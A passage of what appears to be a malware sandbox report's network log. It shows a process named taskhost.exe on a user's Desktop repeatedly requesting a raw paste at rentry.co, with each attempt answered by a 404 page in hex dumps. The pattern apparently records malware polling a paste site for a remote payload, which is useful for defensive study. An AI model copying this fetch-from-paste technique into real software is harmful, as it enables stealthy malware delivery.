                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8f15644a2bdc438c-EWR
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1698&min_rtt=1692&rtt_var=648&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2817&recv_bytes=685&delivery_rate=1671436&cwnd=245&unsent_bytes=0&cid=8982980756dbdc27&ts=580&x=0"
                                                              2024-12-13 10:50:11 UTC498INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                              Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                              2024-12-13 10:50:11 UTC1369INData Raw: 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 73 69 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 40 72 65 6e 74 72 79 5f 63 6f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 73 74 61 74 69 63 2f 69 63 6f 6e 73 2f 35 31 32 2e 70 6e 67 22 20 2f 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e
                                                              Data Ascii: <meta name="twitter:title" content="Rentry.co - Markdown Paste" /> <meta name="twitter:site" content="@rentry_co" /> <meta name="twitter:image" content="https://rentry.co/static/icons/512.png" /> <meta property="og:url" content="https://ren
                                                              2024-12-13 10:50:11 UTC1369INData Raw: 61 74 63 68 65 73 20 7c 7c 20 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 22 64 61 72 6b 2d 6d 6f 64 65 22 29 20 3d 3d 20 22 74 72 75 65 22 29 29 3b 3c 2f 73 63 72 69 70 74 3e 2d 2d 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 63 6f 6e 73 74 20 73 63 72 69 70 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 20 63 6f 6e 73 74 20 68 6e 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 20 3d 3d 3d 20 27 72 65 6e 74 72 79 2e 6f 72 67 27 20 26 26 20 27 72 65 6e 74 72 79 2e 6f 72 67 27 20 7c 7c 20 27 72 65 6e 74 72 79 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65
                                                              Data Ascii: atches || localStorage.getItem("dark-mode") == "true"));</script>--> <script>const script = document.createElement("script"); const hn = window.location.hostname === 'rentry.org' && 'rentry.org' || 'rentry.co'; script.defer = true; script.setAttribute
                                                              2024-12-13 10:50:11 UTC1224INData Raw: 6f 64 65 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20
                                                              Data Ascii: ode"></span></div> </div> </div> </div> <script src="/static/js/jquery.min.js?vsson=28"></script> <script src="/static/js/bootstrap.min.js?vsson=28"></script>
                                                              2024-12-13 10:50:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              15192.168.2.749943104.26.2.164436504C:\Users\user\Desktop\taskhost.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-13 10:50:14 UTC47OUTGET /ue6sxoup/raw HTTP/1.1
                                                              Host: rentry.co
                                                              2024-12-13 10:50:15 UTC875INHTTP/1.1 404 Not Found
                                                              Date: Fri, 13 Dec 2024 10:50:15 GMT
                                                              Content-Type: text/html; charset=utf-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              vary: Origin
                                                              x-xss-protection: 1; mode=block
                                                              strict-transport-security: max-age=31536000; includeSubDomains
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RDYF3hJ3%2FLOA83tMhpfnKr7%2FCrhrrj%2BVpmihWRIr2GxUK%2Bc66ipayGBNkhljLpJO6LokekYQEGazsgltDbJX0zWTE4rbTFrM%2BYuQLNflAGe95zO%2ByTRcbFtrrg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8f1564635accc425-EWR
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1569&min_rtt=1501&rtt_var=611&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2817&recv_bytes=685&delivery_rate=1945369&cwnd=240&unsent_bytes=0&cid=ebbe48cb0f259ebb&ts=844&x=0"
                                                              2024-12-13 10:50:15 UTC494INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                              Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                              2024-12-13 10:50:15 UTC1369INData Raw: 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 73 69 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 40 72 65 6e 74 72 79 5f 63 6f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 73 74 61 74 69 63 2f 69 63 6f 6e 73 2f 35 31 32 2e 70 6e 67 22 20 2f 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f
                                                              Data Ascii: > <meta name="twitter:title" content="Rentry.co - Markdown Paste" /> <meta name="twitter:site" content="@rentry_co" /> <meta name="twitter:image" content="https://rentry.co/static/icons/512.png" /> <meta property="og:url" content="https:/
                                                              2024-12-13 10:50:15 UTC1369INData Raw: 22 29 2e 6d 61 74 63 68 65 73 20 7c 7c 20 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 22 64 61 72 6b 2d 6d 6f 64 65 22 29 20 3d 3d 20 22 74 72 75 65 22 29 29 3b 3c 2f 73 63 72 69 70 74 3e 2d 2d 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 63 6f 6e 73 74 20 73 63 72 69 70 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 20 63 6f 6e 73 74 20 68 6e 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 20 3d 3d 3d 20 27 72 65 6e 74 72 79 2e 6f 72 67 27 20 26 26 20 27 72 65 6e 74 72 79 2e 6f 72 67 27 20 7c 7c 20 27 72 65 6e 74 72 79 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69
                                                              Data Ascii: ").matches || localStorage.getItem("dark-mode") == "true"));</script>--> <script>const script = document.createElement("script"); const hn = window.location.hostname === 'rentry.org' && 'rentry.org' || 'rentry.co'; script.defer = true; script.setAttri
                                                              2024-12-13 10:50:15 UTC1228INData Raw: 68 74 20 6d 6f 64 65 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20
                                                              Data Ascii: ht mode"></span></div> </div> </div> </div> <script src="/static/js/jquery.min.js?vsson=28"></script> <script src="/static/js/bootstrap.min.js?vsson=28"></script>
                                                              2024-12-13 10:50:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              16192.168.2.749954104.26.2.164436504C:\Users\user\Desktop\taskhost.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-13 10:50:18 UTC71OUTGET /ue6sxoup/raw HTTP/1.1
                                                              Host: rentry.co
                                                              Connection: Keep-Alive
                                                              2024-12-13 10:50:19 UTC874INHTTP/1.1 404 Not Found
                                                              Date: Fri, 13 Dec 2024 10:50:19 GMT
                                                              Content-Type: text/html; charset=utf-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              vary: Origin
                                                              x-xss-protection: 1; mode=block
                                                              strict-transport-security: max-age=31536000; includeSubDomains
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c0t%2BXXvw4qlptC70lkohDIpuzR3f5bkibCxLG54AslyzhdxTwNeGop%2BXwLNg9S8IJ%2Fxb0udTPOpaeUlbB4IqPozxvTDC%2BznwQEvhRuWcrMs%2Fm%2FJ5zTmQLmHj9w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8f15647ca895431b-EWR
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1688&min_rtt=1688&rtt_var=844&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4174&recv_bytes=685&delivery_rate=342200&cwnd=177&unsent_bytes=0&cid=28a45104d1297ad1&ts=584&x=0"
                                                              2024-12-13 10:50:19 UTC495INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                              Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                              2024-12-13 10:50:19 UTC1369INData Raw: 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 73 69 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 40 72 65 6e 74 72 79 5f 63 6f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 73 74 61 74 69 63 2f 69 63 6f 6e 73 2f 35 31 32 2e 70 6e 67 22 20 2f 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f
                                                              Data Ascii: <meta name="twitter:title" content="Rentry.co - Markdown Paste" /> <meta name="twitter:site" content="@rentry_co" /> <meta name="twitter:image" content="https://rentry.co/static/icons/512.png" /> <meta property="og:url" content="https://
                                                              2024-12-13 10:50:19 UTC1369INData Raw: 29 2e 6d 61 74 63 68 65 73 20 7c 7c 20 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 22 64 61 72 6b 2d 6d 6f 64 65 22 29 20 3d 3d 20 22 74 72 75 65 22 29 29 3b 3c 2f 73 63 72 69 70 74 3e 2d 2d 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 63 6f 6e 73 74 20 73 63 72 69 70 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 20 63 6f 6e 73 74 20 68 6e 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 20 3d 3d 3d 20 27 72 65 6e 74 72 79 2e 6f 72 67 27 20 26 26 20 27 72 65 6e 74 72 79 2e 6f 72 67 27 20 7c 7c 20 27 72 65 6e 74 72 79 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62
                                                              Data Ascii: ).matches || localStorage.getItem("dark-mode") == "true"));</script>--> <script>const script = document.createElement("script"); const hn = window.location.hostname === 'rentry.org' && 'rentry.org' || 'rentry.co'; script.defer = true; script.setAttrib
                                                              2024-12-13 10:50:19 UTC1227INData Raw: 74 20 6d 6f 64 65 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20
                                                              Data Ascii: t mode"></span></div> </div> </div> </div> <script src="/static/js/jquery.min.js?vsson=28"></script> <script src="/static/js/bootstrap.min.js?vsson=28"></script>
                                                              2024-12-13 10:50:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              17192.168.2.749965104.26.2.164436504C:\Users\user\Desktop\taskhost.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-13 10:50:22 UTC71OUTGET /ue6sxoup/raw HTTP/1.1
                                                              Host: rentry.co
                                                              Connection: Keep-Alive
                                                              2024-12-13 10:50:23 UTC867INHTTP/1.1 404 Not Found
                                                              Date: Fri, 13 Dec 2024 10:50:22 GMT
                                                              Content-Type: text/html; charset=utf-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              vary: Origin
                                                              x-xss-protection: 1; mode=block
                                                              strict-transport-security: max-age=31536000; includeSubDomains
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D%2FE2LuRHj2iXYk4D6AIicwxStEq9QjeG3cdW2RQNxwETnijMlwVWBWSDt42wqfmwIoJgcJHah9jA9UVRYlJtEbekvHOeHfcKEbmZHWJWmaQzzK216wq3yoaq%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8f156492ea3b421c-EWR
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1582&min_rtt=1568&rtt_var=617&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2817&recv_bytes=685&delivery_rate=1733966&cwnd=252&unsent_bytes=0&cid=42b037226ab416b4&ts=818&x=0"
                                                              2024-12-13 10:50:23 UTC502INData Raw: 31 31 36 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                              Data Ascii: 1163<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                              2024-12-13 10:50:23 UTC1369INData Raw: 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 73 69 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 40 72 65 6e 74 72 79 5f 63 6f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 73 74 61 74 69 63 2f 69 63 6f 6e 73 2f 35 31 32 2e 70 6e 67 22 20 2f 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e
                                                              Data Ascii: eta name="twitter:title" content="Rentry.co - Markdown Paste" /> <meta name="twitter:site" content="@rentry_co" /> <meta name="twitter:image" content="https://rentry.co/static/icons/512.png" /> <meta property="og:url" content="https://rentry.
                                                              2024-12-13 10:50:23 UTC1369INData Raw: 65 73 20 7c 7c 20 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 22 64 61 72 6b 2d 6d 6f 64 65 22 29 20 3d 3d 20 22 74 72 75 65 22 29 29 3b 3c 2f 73 63 72 69 70 74 3e 2d 2d 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 63 6f 6e 73 74 20 73 63 72 69 70 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 20 63 6f 6e 73 74 20 68 6e 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 20 3d 3d 3d 20 27 72 65 6e 74 72 79 2e 6f 72 67 27 20 26 26 20 27 72 65 6e 74 72 79 2e 6f 72 67 27 20 7c 7c 20 27 72 65 6e 74 72 79 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61
                                                              Data Ascii: es || localStorage.getItem("dark-mode") == "true"));</script>--> <script>const script = document.createElement("script"); const hn = window.location.hostname === 'rentry.org' && 'rentry.org' || 'rentry.co'; script.defer = true; script.setAttribute('da
                                                              2024-12-13 10:50:23 UTC1219INData Raw: 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20
                                                              Data Ascii: ></span></div> </div> </div> </div> <script src="/static/js/jquery.min.js?vsson=28"></script> <script src="/static/js/bootstrap.min.js?vsson=28"></script>
                                                              2024-12-13 10:50:23 UTC6INData Raw: 31 0d 0a 0a 0d 0a
                                                              Data Ascii: 1
                                                              2024-12-13 10:50:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              18192.168.2.749976104.26.2.164436504C:\Users\user\Desktop\taskhost.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-13 10:50:25 UTC47OUTGET /ue6sxoup/raw HTTP/1.1
                                                              Host: rentry.co
                                                              2024-12-13 10:50:26 UTC873INHTTP/1.1 404 Not Found
                                                              Date: Fri, 13 Dec 2024 10:50:26 GMT
                                                              Content-Type: text/html; charset=utf-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              vary: Origin
                                                              x-xss-protection: 1; mode=block
                                                              strict-transport-security: max-age=31536000; includeSubDomains
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rVCCjmWhFJSmeka4%2BeBAECG3RE5Ms3f4pcqCXrxkB0Egw7mY4I%2BAIpkTNmV4aHDDZ%2FwtyZLybV%2FDmWWYMSHe9iH1X1gpNyOCHZdZE33ZmV%2FuYcujupJD5rlCRQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8f1564a9bd580f9d-EWR
